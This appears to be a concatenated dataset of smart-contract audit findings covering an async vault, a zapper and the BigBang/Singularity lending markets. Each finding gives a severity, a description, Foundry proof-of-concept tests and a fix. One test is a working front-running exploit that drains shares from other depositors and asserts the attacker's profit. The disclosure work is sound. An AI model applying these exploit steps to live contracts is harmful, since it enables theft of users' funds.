'owner', provided that the user has been granted sufficient allowance by the 'owner'. However, this action results in a complete loss of balance.\\nThe `_createRedeemRequest` function contains a discrepancy; it fails to update the `lastRedeemRequestId` for the user eligible to claim the shares upon maturity. Instead, it updates this identifier for the 'owner' who delegated their shares to the user. 
As a result, the shares become permanently locked in the vault, rendering them unclaimable by either the 'owner' or the user.\\nThis issue unfolds as follows:\\nThe 'owner' deposits tokens into the vault, receiving vault `shares` in return.\\nThe 'owner' then delegates the allowance of all their vault `shares` to another user.\\nWhen `epochId == 1`, this user executes The `requestRedeem` , specifying the 'owner''s address as `owner`, the user's address as `receiver`, and the 'owner''s share balance as `shares`.\\nThe internal function `_createRedeemRequest` is invoked, incrementing `epochs[epochId].redeemRequestBalance[receiver]` by the amount of `shares`, and setting `lastRedeemRequestId[owner] = epochId`.\\nAt `epochId == 2`, the user calls `claimRedeem`, which in turn calls the internal function `_claimRedeem`, with `owner` set to `_msgSender()` (i.e., the user's address) and `receiver` also set to the user's address.\\nIn this scenario, `lastRequestId` remains zero because `lastRedeemRequestId[owner] == 0` (here, `owner` refers to the user's address). Consequently, `epochs[lastRequestId].redeemRequestBalance[owner]` is also zero. 
Therefore, no `shares` are minted to the user.\\nProof of Code :\\nThe following test demonstrates the claim made above :\\n```\\nfunction test_poc() external {\\n // set token balances\\n deal(vaultTested.asset(), user1.addr, 20); // owner\\n\\n vm.startPrank(user1.addr);\\n IERC20Metadata(vaultTested.asset()).approve(address(vaultTested), 20);\\n // owner deposits tokens when vault is open and receives vault shares\\n vaultTested.deposit(20, user1.addr);\\n // owner delegates shares balance to user\\n IERC20Metadata(address(vaultTested)).approve(\\n user2.addr,\\n vaultTested.balanceOf(user1.addr)\\n );\\n vm.stopPrank();\\n\\n // vault is closed\\n vm.prank(vaultTested.owner());\\n vaultTested.close();\\n\\n // epoch = 1\\n vm.startPrank(user2.addr);\\n // user requests a redeem on behlaf of owner\\n vaultTested.requestRedeem(\\n vaultTested.balanceOf(user1.addr),\\n user2.addr,\\n user1.addr,\\n \"\"\\n );\\n // user checks the pending redeem request amount\\n assertEq(vaultTested.pendingRedeemRequest(user2.addr), 20);\\n vm.stopPrank();\\n\\n vm.startPrank(vaultTested.owner());\\n IERC20Metadata(vaultTested.asset()).approve(\\n address(vaultTested),\\n type(uint256).max\\n );\\n vaultTested.settle(23); // an epoch goes by\\n vm.stopPrank();\\n\\n // epoch = 2\\n\\n vm.startPrank(user2.addr);\\n // user tries to claim the redeem\\n vaultTested.claimRedeem(user2.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n // however, token balance of user is still empty\\n vm.stopPrank();\\n\\n vm.startPrank(user1.addr);\\n // owner also tries to claim the redeem\\n vaultTested.claimRedeem(user1.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n // however, token balance of owner is still empty\\n vm.stopPrank();\\n\\n // all the balances of owner and user are zero, indicating loss of funds\\n assertEq(vaultTested.balanceOf(user1.addr), 0);\\n 
assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n assertEq(vaultTested.balanceOf(user2.addr), 0);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n }\\n```\\n\\nTo run the test :\\nCopy the above code and paste it into `TestClaimDeposit.t.sol`\\nRun `forge test --match-test test_poc --ffi`чModify `_createRedeemRequest` as follows :\\n```\\n// Remove the line below\\n lastRedeemRequestId[owner] = epochId;\\n// Add the line below\\n lastRedeemRequestId[receiver] = epochId;\\n```\\nчThe shares are locked in the vault forever with no method for recovery by the user or the 'owner'.ч```\\nfunction test_poc() external {\\n // set token balances\\n deal(vaultTested.asset(), user1.addr, 20); // owner\\n\\n vm.startPrank(user1.addr);\\n IERC20Metadata(vaultTested.asset()).approve(address(vaultTested), 20);\\n // owner deposits tokens when vault is open and receives vault shares\\n vaultTested.deposit(20, user1.addr);\\n // owner delegates shares balance to user\\n IERC20Metadata(address(vaultTested)).approve(\\n user2.addr,\\n vaultTested.balanceOf(user1.addr)\\n );\\n vm.stopPrank();\\n\\n // vault is closed\\n vm.prank(vaultTested.owner());\\n vaultTested.close();\\n\\n // epoch = 1\\n vm.startPrank(user2.addr);\\n // user requests a redeem on behalf of owner\\n vaultTested.requestRedeem(\\n vaultTested.balanceOf(user1.addr),\\n user2.addr,\\n user1.addr,\\n \"\"\\n );\\n // user checks the pending redeem request amount\\n assertEq(vaultTested.pendingRedeemRequest(user2.addr), 20);\\n vm.stopPrank();\\n\\n vm.startPrank(vaultTested.owner());\\n IERC20Metadata(vaultTested.asset()).approve(\\n address(vaultTested),\\n type(uint256).max\\n );\\n vaultTested.settle(23); // an epoch goes by\\n vm.stopPrank();\\n\\n // epoch = 2\\n\\n vm.startPrank(user2.addr);\\n // user tries to claim the redeem\\n vaultTested.claimRedeem(user2.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n // however, 
token balance of user is still empty\\n vm.stopPrank();\\n\\n vm.startPrank(user1.addr);\\n // owner also tries to claim the redeem\\n vaultTested.claimRedeem(user1.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n // however, token balance of owner is still empty\\n vm.stopPrank();\\n\\n // all the balances of owner and user are zero, indicating loss of funds\\n assertEq(vaultTested.balanceOf(user1.addr), 0);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n assertEq(vaultTested.balanceOf(user2.addr), 0);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n }\\n```\\n -Exchange rate is calculated incorrectly when the vault is closed, potentially leading to funds being stolenчhighчThe exchange ratio between shares and assets is calculated incorrectly when the vault is closed. This can cause accounting inconsistencies, funds being stolen and users being unable to redeem shares.\\nThe functions AsyncSynthVault::_convertToAssets and AsyncSynthVault::_convertToShares both add `1` to the epoch cached variables `totalAssetsSnapshotForDeposit`, `totalSupplySnapshotForDeposit`, `totalAssetsSnapshotForRedeem` and `totalSupplySnapshotForRedeem`.\\nThis is incorrect because the function previewSettle, used in _settle(), already adds `1` to the variables:\\n```\\n// rest of code\\nuint256 totalAssetsSnapshotForDeposit = _lastSavedBalance + 1;\\nuint256 totalSupplySnapshotForDeposit = totalSupply + 1;\\n// rest of code\\nuint256 totalAssetsSnapshotForRedeem = _lastSavedBalance + pendingDeposit + 1;\\nuint256 totalSupplySnapshotForRedeem = totalSupply + sharesToMint + 1;\\n// rest of code\\n```\\n\\nThis leads to accounting inconsistencies between depositing/redeeming when a vault is closed and depositing/redeeming when a vault is open whenever the exchange ratio assets/shares is not exactly 1:1.\\nIf a share is worth more than one asset:\\nUsers that will request a deposit while the vault is 
closed will receive more shares than they should\\nUsers that will request a redeem while the vault is closed will receive less assets than they should\\nPOC\\nThis can be taken advantage of by an attacker by doing the following:\\nThe attacker monitors the mempool for a vault deployment.\\nBefore the vault is deployed the attacker transfers to the vault some of the vault underlying asset (donation). This increases the value of one share.\\nThe protocol team initializes the vault and adds the bootstrap liquidity.\\nUsers use the protocol normally and deposits some assets.\\nThe vault gets closed by the protocol team and the funds invested.\\nSome users request a deposit while the vault is closed.\\nThe attacker monitors the mempool to know when the vault will be open again.\\nRight before the vault is opened, the attacker performs multiple deposit requests with different accounts. For each account he deposits the minimum amount of assets required to receive 1 share.\\nThe vault opens.\\nThe attacker claims all of the deposits with every account and then redeems the shares immediately for profit.\\nThis will \"steal\" shares of other users (point 6) from the claimable silo because the protocol will give the attacker more shares than it should. 
The attacker will profit and some users won't be able to claim their shares.\\nAdd imports to TestClaimRedeem.t.sol:\\n```\\nimport { IERC20 } from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\n```\\n\\nand copy-paste:\\n```\\nfunction test_attackerProfitsViaRequestingDeposits() external {\\n address attacker = makeAddr(\"attacker\");\\n address protocolUsers = makeAddr(\"alice\");\\n address vaultOwner = vaultTested.owner();\\n\\n uint256 donation = 1e18 - 1;\\n uint256 protocolUsersDeposit = 10e18 + 15e18;\\n uint256 protocolTeamBootstrapDeposit = 1e18;\\n\\n IERC20 asset = IERC20(vaultTested.asset());\\n deal(address(asset), protocolUsers, protocolUsersDeposit);\\n deal(address(asset), attacker, donation);\\n deal(address(asset), vaultOwner, protocolTeamBootstrapDeposit);\\n\\n vm.prank(vaultOwner);\\n asset.approve(address(vaultTested), type(uint256).max);\\n\\n vm.prank(protocolUsers);\\n asset.approve(address(vaultTested), type(uint256).max);\\n\\n vm.prank(attacker);\\n asset.approve(address(vaultTested), type(uint256).max);\\n\\n //-> Attacker donates `1e18 - 1` assets, this can be done before the vault is even deployed\\n vm.prank(attacker);\\n asset.transfer(address(vaultTested), donation);\\n\\n //-> Protocol team bootstraps the vault with `1e18` of assets\\n vm.prank(vaultOwner);\\n vaultTested.deposit(protocolTeamBootstrapDeposit, vaultOwner);\\n \\n //-> Users deposit `10e18` of liquidity in the vault\\n vm.prank(protocolUsers);\\n vaultTested.deposit(10e18, protocolUsers);\\n\\n //-> Vault gets closed\\n vm.prank(vaultOwner);\\n vaultTested.close();\\n\\n //-> Users request deposits for `15e18` assets\\n vm.prank(protocolUsers);\\n vaultTested.requestDeposit(15e18, protocolUsers, protocolUsers, \"\");\\n\\n //-> The attacker frontruns the call to `open()` and knows that:\\n //- The current epoch cached `totalSupply` of shares will be `vaultTested.totalSupply()` + 1 + 1\\n //- The current epoch cached `totalAssets` will be 12e18 + 1 + 1\\n 
uint256 totalSupplyCachedOnOpen = vaultTested.totalSupply() + 1 + 1; //Current supply of shares, plus 1 used as virtual share, plus 1 added by `_convertToAssets`\\n uint256 totalAssetsCachedOnOpen = vaultTested.lastSavedBalance() + 1 + 1; //Total assets passed as paremeter to `open`, plus 1 used as virtual share, plus 1 added by `_convertToAssets`\\n uint256 minToDepositToGetOneShare = totalAssetsCachedOnOpen / totalSupplyCachedOnOpen;\\n\\n //-> Attacker frontruns the call to `open()` by requesting a deposit with multiple fresh accounts\\n uint256 totalDeposited = 0;\\n for(uint256 i = 0; i < 30; i++) {\\n address attackerEOA = address(uint160(i * 31000 + 49*49)); //Random address that does not conflict with existing ones\\n deal(address(asset), attackerEOA, minToDepositToGetOneShare);\\n vm.startPrank(attackerEOA);\\n asset.approve(address(vaultTested), type(uint256).max);\\n vaultTested.requestDeposit(minToDepositToGetOneShare, attackerEOA, attackerEOA, \"\");\\n vm.stopPrank();\\n totalDeposited += minToDepositToGetOneShare;\\n }\\n\\n //->Vault gets opened again with 0 profit and 0 losses (for simplicity)\\n vm.startPrank(vaultOwner);\\n vaultTested.open(vaultTested.lastSavedBalance());\\n vm.stopPrank();\\n\\n //-> Attacker claims his deposits and withdraws them immediately for profit\\n uint256 totalRedeemed = 0;\\n for(uint256 i = 0; i < 30; i++) {\\n address attackerEOA = address(uint160(i * 31000 + 49*49)); //Random address that does not conflict with existing ones\\n vm.startPrank(attackerEOA);\\n vaultTested.claimDeposit(attackerEOA);\\n uint256 assets = vaultTested.redeem(vaultTested.balanceOf(attackerEOA), attackerEOA, attackerEOA);\\n vm.stopPrank();\\n totalRedeemed += assets;\\n }\\n\\n //->❌ Attacker is in profit\\n assertGt(totalRedeemed, totalDeposited + donation);\\n}\\n```\\nчIn the functions AsyncSynthVault::_convertToAssets and AsyncSynthVault::_convertToShares:\\nReturn `0` if `requestId == 0`\\nDon't add `1` to the two cached 
variables\\nIt's also a good idea to perform the initial bootstrapping deposit in the initialize function (as suggested in another finding) and require that the vault contains `0` assets when the first deposit is performed.чWhen the ratio between shares and assets is not 1:1 the protocol calculates the exchange rate between assets and shares inconsistently. This is an issue by itself and can lead to loss of funds and users not being able to claim shares. It can also be taken advantage of by an attacker to steal shares from the claimable silo.\\nNote that the \"donation\" done initially is not akin to an \"inflation\" attack because the attacker is not required to mint any share.ч```\\n// rest of code\\nuint256 totalAssetsSnapshotForDeposit = _lastSavedBalance + 1;\\nuint256 totalSupplySnapshotForDeposit = totalSupply + 1;\\n// rest of code\\nuint256 totalAssetsSnapshotForRedeem = _lastSavedBalance + pendingDeposit + 1;\\nuint256 totalSupplySnapshotForRedeem = totalSupply + sharesToMint + 1;\\n// rest of code\\n```\\n -The `_zapIn` function may unexpectedly revert due to the incorrect implementation of `_transferTokenInAndApprove`чmediumчThe `_transferTokenInAndApprove` function should approve the `router` on behalf of the VaultZapper contract. However, it checks the allowance from `msgSender` to the `router`, rather than the VaultZapper. This potentially results in the VaultZapper not approving the `router` and causing unexpected reverting.\\nThe allowance check in the `_transferTokenInAndApprove` function should verify that `address(this)` has approved sufficient amount of `tokenIn` to the `router`. 
However, it currently checks the allowance of `_msgSender()`, which is unnecessary and may cause transaction reverting if `_msgSender` had previously approved the `router`.\\n```\\n function _transferTokenInAndApprove(\\n address router,\\n IERC20 tokenIn,\\n uint256 amount\\n )\\n internal\\n {\\n tokenIn.safeTransferFrom(_msgSender(), address(this), amount);\\n//@ The check of allowance is useless, we should check the allowance from address(this) rather than the msgSender\\n if (tokenIn.allowance(_msgSender(), router) < amount) {\\n tokenIn.forceApprove(router, amount);\\n }\\n }\\n```\\n\\nPOC\\nApply the patch to `asynchronous-vault/test/Zapper/ZapperDeposit.t.sol` to add the test case and run it with `forge test --match-test test_zapIn --ffi`.\\n```\\ndiff --git a/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol b/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol\\nindex 9083127..ff11b56 100644\\n--- a/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol\\n@@ -17,6 // Add the line below\\n17,25 @@ contract VaultZapperDeposit is OffChainCalls {\\n zapper = new VaultZapper();\\n }\\n\\n// Add the line below\\n function test_zapIn() public {\\n// Add the line below\\n Swap memory params =\\n// Add the line below\\n Swap(_router, _USDC, _WSTETH, 1500 * 1e6, 1, address(0), 20);\\n// Add the line below\\n _setUpVaultAndZapper(_WSTETH);\\n// Add the line below\\n\\n// Add the line below\\n IERC4626 vault = _vault;\\n// Add the line below\\n bytes memory swapData =\\n// Add the line below\\n _getSwapData(address(zapper), address(zapper), params);\\n// Add the line below\\n\\n// Add the line below\\n _getTokenIn(params);\\n// Add the line below\\n\\n// Add the line below\\n // If the msgSender() happend to approve the SwapRouter before, then the zap will always revert\\n// Add the line below\\n 
IERC20(params.tokenIn).approve(address(params.router), params.amount);\\n// Add the line below\\n zapper.zapAndDeposit(\\n// Add the line below\\n params.tokenIn, vault, params.router, params.amount, swapData\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n }\\n// Add the line below\\n\\n //// test_zapAndDeposit ////\\n function test_zapAndDepositUsdcWSTETH() public {\\n Swap memory usdcToWstEth =\\n```\\n\\nResult:\\n```\\nRan 1 test for test/Zapper/ZapperDeposit.t.sol:VaultZapperDeposit\\n[FAIL. Reason: SwapFailed(\"\\u{8}�y�\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0 \\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0(ERC20: transfer amount exceeds allowance\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\")] test_zapIn() (gas: 4948462)\\nSuite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 20.84s (18.74s CPU time)\\n\\nRan 1 test suite in 22.40s (20.84s CPU time): 0 tests passed, 1 failed, 0 skipped (1 total tests)\\n\\nFailing tests:\\nEncountered 1 failing test in test/Zapper/ZapperDeposit.t.sol:VaultZapperDeposit\\n[FAIL. 
Reason: SwapFailed(\"\\u{8}�y�\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0 \\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0(ERC20: transfer amount exceeds allowance\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\")] test_zapIn() (gas: 4948462)\\n```\\nчFix the issue:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol b/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol\\nindex 9943535..9cf6df9 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol\\n@@ // Remove the line below\\n165,7 // Add the line below\\n165,7 @@ contract VaultZapper is Ownable2Step, Pausable {\\n internal\\n {\\n tokenIn.safeTransferFrom(_msgSender(), address(this), amount);\\n// Remove the line below\\n if (tokenIn.allowance(_msgSender(), router) < amount) {\\n// Add the line below\\n if (tokenIn.allowance(address(this), router) < amount) {\\n tokenIn.forceApprove(router, amount);\\n }\\n }\\n```\\nчThis issue could lead to transaction reverting when users interact with the contract normally, thereby affecting the contract's regular functionality.ч```\\n function _transferTokenInAndApprove(\\n address router,\\n IERC20 tokenIn,\\n uint256 amount\\n )\\n internal\\n {\\n tokenIn.safeTransferFrom(_msgSender(), address(this), amount);\\n//@ The check of allowance is useless, we should check the allowance from address(this) rather than the msgSender\\n if (tokenIn.allowance(_msgSender(), router) < amount) {\\n tokenIn.forceApprove(router, amount);\\n }\\n }\\n```\\n -Unupdated totalBorrow After BigBang LiquidationчhighчDuring the 
liquidation process, BigBang only reduces the user's `userBorrowPart[user]`, but fails to update the global `totalBorrow`. Consequently, all subsequent debt calculations are incorrect.\\nCurrently, the implementation relies on the `BBLiquidation._updateBorrowAndCollateralShare()` method to calculate user debt repayment and collateral collection. The code snippet is as follows:\\n```\\n function _liquidateUser(\\n address user,\\n uint256 maxBorrowPart,\\n IMarketLiquidatorReceiver _liquidatorReceiver,\\n bytes calldata _liquidatorReceiverData,\\n uint256 _exchangeRate,\\n uint256 minLiquidationBonus\\n ) private {\\n uint256 callerReward = _getCallerReward(user, _exchangeRate);\\n\\n (uint256 borrowAmount,, uint256 collateralShare) =\\n _updateBorrowAndCollateralShare(user, maxBorrowPart, minLiquidationBonus, _exchangeRate);\\n totalCollateralShare = totalCollateralShare > collateralShare ? totalCollateralShare - collateralShare : 0;\\n uint256 borrowShare = yieldBox.toShare(assetId, borrowAmount, true);\\n\\n (uint256 returnedShare,) =\\n _swapCollateralWithAsset(collateralShare, _liquidatorReceiver, _liquidatorReceiverData);\\n if (returnedShare < borrowShare) revert AmountNotValid();\\n\\n (uint256 feeShare, uint256 callerShare) = _extractLiquidationFees(returnedShare, borrowShare, callerReward);\\n\\n IUsdo(address(asset)).burn(address(this), borrowAmount);\\n\\n address[] memory _users = new address[](1);\\n _users[0] = user;\\n emit Liquidated(msg.sender, _users, callerShare, feeShare, borrowAmount, collateralShare);\\n }\\n\\n function _updateBorrowAndCollateralShare(\\n address user,\\n uint256 maxBorrowPart,\\n uint256 minLiquidationBonus, // min liquidation bonus to accept (default 0)\\n uint256 _exchangeRate\\n ) private returns (uint256 borrowAmount, uint256 borrowPart, uint256 collateralShare) {\\n if (_exchangeRate == 0) revert ExchangeRateNotValid();\\n\\n // get collateral amount in asset's value\\n uint256 collateralPartInAsset = (\\n 
yieldBox.toAmount(collateralId, userCollateralShare[user], false) * EXCHANGE_RATE_PRECISION\\n ) / _exchangeRate;\\n\\n // compute closing factor (liquidatable amount)\\n uint256 borrowPartWithBonus =\\n computeClosingFactor(userBorrowPart[user], collateralPartInAsset, FEE_PRECISION_DECIMALS);\\n\\n // limit liquidable amount before bonus to the current debt\\n uint256 userTotalBorrowAmount = totalBorrow.toElastic(userBorrowPart[user], true);\\n borrowPartWithBonus = borrowPartWithBonus > userTotalBorrowAmount ? userTotalBorrowAmount : borrowPartWithBonus;\\n\\n // check the amount to be repaid versus liquidator supplied limit\\n borrowPartWithBonus = borrowPartWithBonus > maxBorrowPart ? maxBorrowPart : borrowPartWithBonus;\\n borrowAmount = borrowPartWithBonus;\\n\\n // compute part units, preventing rounding dust when liquidation is full\\n borrowPart = borrowAmount == userTotalBorrowAmount\\n ? userBorrowPart[user]\\n : totalBorrow.toBase(borrowPartWithBonus, false);\\n if (borrowPart == 0) revert Solvent();\\n\\n if (liquidationBonusAmount > 0) {\\n borrowPartWithBonus = borrowPartWithBonus + (borrowPartWithBonus * liquidationBonusAmount) / FEE_PRECISION;\\n }\\n\\n if (collateralPartInAsset < borrowPartWithBonus) {\\n if (collateralPartInAsset <= userTotalBorrowAmount) {\\n revert BadDebt();\\n }\\n // If current debt is covered by collateral fully\\n // then there is some liquidation bonus,\\n // so liquidation can proceed if liquidator's minimum is met\\n if (minLiquidationBonus > 0) {\\n // `collateralPartInAsset > borrowAmount` as `borrowAmount <= userTotalBorrowAmount`\\n uint256 effectiveBonus = ((collateralPartInAsset - borrowAmount) * FEE_PRECISION) / borrowAmount;\\n if (effectiveBonus < minLiquidationBonus) {\\n revert InsufficientLiquidationBonus();\\n }\\n collateralShare = userCollateralShare[user];\\n } else {\\n revert InsufficientLiquidationBonus();\\n }\\n } else {\\n collateralShare =\\n yieldBox.toShare(collateralId, (borrowPartWithBonus * 
_exchangeRate) / EXCHANGE_RATE_PRECISION, false);\\n if (collateralShare > userCollateralShare[user]) {\\n revert NotEnoughCollateral();\\n }\\n }\\n\\n userBorrowPart[user] -= borrowPart;\\n userCollateralShare[user] -= collateralShare;\\n }\\n```\\n\\nThe methods mentioned above update the user-specific variables `userBorrowPart[user]` and `userCollateralShare[user]` within the `_updateBorrowAndCollateralShare()` method. Additionally, the global variable `totalCollateralShare` is updated within the `_liquidateUser()` method.\\nHowever, there's another crucial global variable, `totalBorrow`, which remains unaltered throughout the entire liquidation process.\\nFailure to update `totalBorrow` during liquidation will result in incorrect subsequent loan-related calculations.\\nNote: SGL Liquidation has the same issuesч```\\n function _liquidateUser(\\n address user,\\n uint256 maxBorrowPart,\\n IMarketLiquidatorReceiver _liquidatorReceiver,\\n bytes calldata _liquidatorReceiverData,\\n uint256 _exchangeRate,\\n uint256 minLiquidationBonus\\n ) private {\\n uint256 callerReward = _getCallerReward(user, _exchangeRate);\\n\\n// Remove the line below\\n (uint256 borrowAmount,, uint256 collateralShare) =\\n// Add the line below\\n (uint256 borrowAmount,uint256 borrowPart, uint256 collateralShare) =\\n _updateBorrowAndCollateralShare(user, maxBorrowPart, minLiquidationBonus, _exchangeRate);\\n totalCollateralShare = totalCollateralShare > collateralShare ? totalCollateralShare // Remove the line below\\n collateralShare : 0;\\n// Add the line below\\n totalBorrow.elastic // Remove the line below\\n= borrowAmount.toUint128();\\n// Add the line below\\n totalBorrow.base // Remove the line below\\n= borrowPart.toUint128();\\n```\\nчThe lack of an update to `totalBorrow` during liquidation leads to inaccuracies in subsequent loan-related calculations. 
For instance, this affects interest accumulation and the amount of interest due.ч```\\n function _liquidateUser(\\n address user,\\n uint256 maxBorrowPart,\\n IMarketLiquidatorReceiver _liquidatorReceiver,\\n bytes calldata _liquidatorReceiverData,\\n uint256 _exchangeRate,\\n uint256 minLiquidationBonus\\n ) private {\\n uint256 callerReward = _getCallerReward(user, _exchangeRate);\\n\\n (uint256 borrowAmount,, uint256 collateralShare) =\\n _updateBorrowAndCollateralShare(user, maxBorrowPart, minLiquidationBonus, _exchangeRate);\\n totalCollateralShare = totalCollateralShare > collateralShare ? totalCollateralShare - collateralShare : 0;\\n uint256 borrowShare = yieldBox.toShare(assetId, borrowAmount, true);\\n\\n (uint256 returnedShare,) =\\n _swapCollateralWithAsset(collateralShare, _liquidatorReceiver, _liquidatorReceiverData);\\n if (returnedShare < borrowShare) revert AmountNotValid();\\n\\n (uint256 feeShare, uint256 callerShare) = _extractLiquidationFees(returnedShare, borrowShare, callerReward);\\n\\n IUsdo(address(asset)).burn(address(this), borrowAmount);\\n\\n address[] memory _users = new address[](1);\\n _users[0] = user;\\n emit Liquidated(msg.sender, _users, callerShare, feeShare, borrowAmount, collateralShare);\\n }\\n\\n function _updateBorrowAndCollateralShare(\\n address user,\\n uint256 maxBorrowPart,\\n uint256 minLiquidationBonus, // min liquidation bonus to accept (default 0)\\n uint256 _exchangeRate\\n ) private returns (uint256 borrowAmount, uint256 borrowPart, uint256 collateralShare) {\\n if (_exchangeRate == 0) revert ExchangeRateNotValid();\\n\\n // get collateral amount in asset's value\\n uint256 collateralPartInAsset = (\\n yieldBox.toAmount(collateralId, userCollateralShare[user], false) * EXCHANGE_RATE_PRECISION\\n ) / _exchangeRate;\\n\\n // compute closing factor (liquidatable amount)\\n uint256 borrowPartWithBonus =\\n computeClosingFactor(userBorrowPart[user], collateralPartInAsset, FEE_PRECISION_DECIMALS);\\n\\n // limit 
liquidable amount before bonus to the current debt\\n uint256 userTotalBorrowAmount = totalBorrow.toElastic(userBorrowPart[user], true);\\n borrowPartWithBonus = borrowPartWithBonus > userTotalBorrowAmount ? userTotalBorrowAmount : borrowPartWithBonus;\\n\\n // check the amount to be repaid versus liquidator supplied limit\\n borrowPartWithBonus = borrowPartWithBonus > maxBorrowPart ? maxBorrowPart : borrowPartWithBonus;\\n borrowAmount = borrowPartWithBonus;\\n\\n // compute part units, preventing rounding dust when liquidation is full\\n borrowPart = borrowAmount == userTotalBorrowAmount\\n ? userBorrowPart[user]\\n : totalBorrow.toBase(borrowPartWithBonus, false);\\n if (borrowPart == 0) revert Solvent();\\n\\n if (liquidationBonusAmount > 0) {\\n borrowPartWithBonus = borrowPartWithBonus + (borrowPartWithBonus * liquidationBonusAmount) / FEE_PRECISION;\\n }\\n\\n if (collateralPartInAsset < borrowPartWithBonus) {\\n if (collateralPartInAsset <= userTotalBorrowAmount) {\\n revert BadDebt();\\n }\\n // If current debt is covered by collateral fully\\n // then there is some liquidation bonus,\\n // so liquidation can proceed if liquidator's minimum is met\\n if (minLiquidationBonus > 0) {\\n // `collateralPartInAsset > borrowAmount` as `borrowAmount <= userTotalBorrowAmount`\\n uint256 effectiveBonus = ((collateralPartInAsset - borrowAmount) * FEE_PRECISION) / borrowAmount;\\n if (effectiveBonus < minLiquidationBonus) {\\n revert InsufficientLiquidationBonus();\\n }\\n collateralShare = userCollateralShare[user];\\n } else {\\n revert InsufficientLiquidationBonus();\\n }\\n } else {\\n collateralShare =\\n yieldBox.toShare(collateralId, (borrowPartWithBonus * _exchangeRate) / EXCHANGE_RATE_PRECISION, false);\\n if (collateralShare > userCollateralShare[user]) {\\n revert NotEnoughCollateral();\\n }\\n }\\n\\n userBorrowPart[user] -= borrowPart;\\n userCollateralShare[user] -= collateralShare;\\n }\\n```\\n -`_computeClosingFactor` function will return incorrect 
values, lower than needed, because it uses `collateralizationRate` to calculate the denominatorчhighч`_computeClosingFactor` is used to calculate the required borrow amount that should be liquidated to make the user's position solvent. However, this function uses `collateralizationRate` (defaulting to 75%) to calculate the liquidated amount, while the threshold to be liquidatable is `liquidationCollateralizationRate` (defaulting to 80%). Therefore, it will return incorrect liquidated amount.\\nIn `_computeClosingFactor` of Market contract:\\n```\\n//borrowPart and collateralPartInAsset should already be scaled due to the exchange rate computation\\nuint256 liquidationStartsAt =\\n (collateralPartInAsset * _liquidationCollateralizationRate) / (10 ** ratesPrecision);///80% collateral value in asset in default\\n\\nif (borrowPart < liquidationStartsAt) return 0;\\n\\n//compute numerator\\nuint256 numerator = borrowPart - liquidationStartsAt;\\n//compute denominator\\nuint256 diff =\\n (collateralizationRate * ((10 ** ratesPrecision) + _liquidationMultiplier)) / (10 ** ratesPrecision);\\nint256 denominator = (int256(10 ** ratesPrecision) - int256(diff)) * int256(1e13);\\n\\n//compute closing factor\\nint256 x = (int256(numerator) * int256(1e18)) / denominator;\\n```\\n\\nA user will be able to be liquidated if their ratio between borrow and collateral value exceeds `liquidationCollateralizationRate` (see `_isSolvent()` function). However, `_computeClosingFactor` uses `collateralizationRate` (defaulting to 75%) to calculate the denominator for the needed liquidate amount, while the numerator is calculated by using `liquidationCollateralizationRate` (80% in default). 
These variables were initialized in `_initCoreStorage()`.\\nIn the above calculation of `_computeClosingFactor` function, in default: `_liquidationMultiplier` = 12%, `numerator` = `borrowPart` - `liquidationStartsAt` = borrowAmount - 80% * collateralToAssetAmount => x will be: `numerator` / (1 - 75% * 112%) = `numerator` / 16%\\nHowever, during a partial liquidation of BigBang or Singularity, the actual collateral bonus is `liquidationBonusAmount`, defaulting to 10%. (code snippet). Therefore, the minimum liquidated amount required to make user solvent (unable to be liquidated again) is: numerator / (1 - 80% * 110%) = numerator / 12%.\\nAs result, `computeClosingFactor()` function will return a lower liquidated amount than needed to make user solvent, even when that function attempts to over-liquidate with `_liquidationMultiplier` > `liquidationBonusAmount`.чUse `liquidationCollateralizationRate` instead of `collateralizationRate` to calculate the denominator in `_computeClosingFactor`чThis issue will result in the user still being liquidatable after a partial liquidation because it liquidates a lower amount than needed. Therefore, the user will never be solvent again after they are undercollateralized until their position is fully liquidated. 
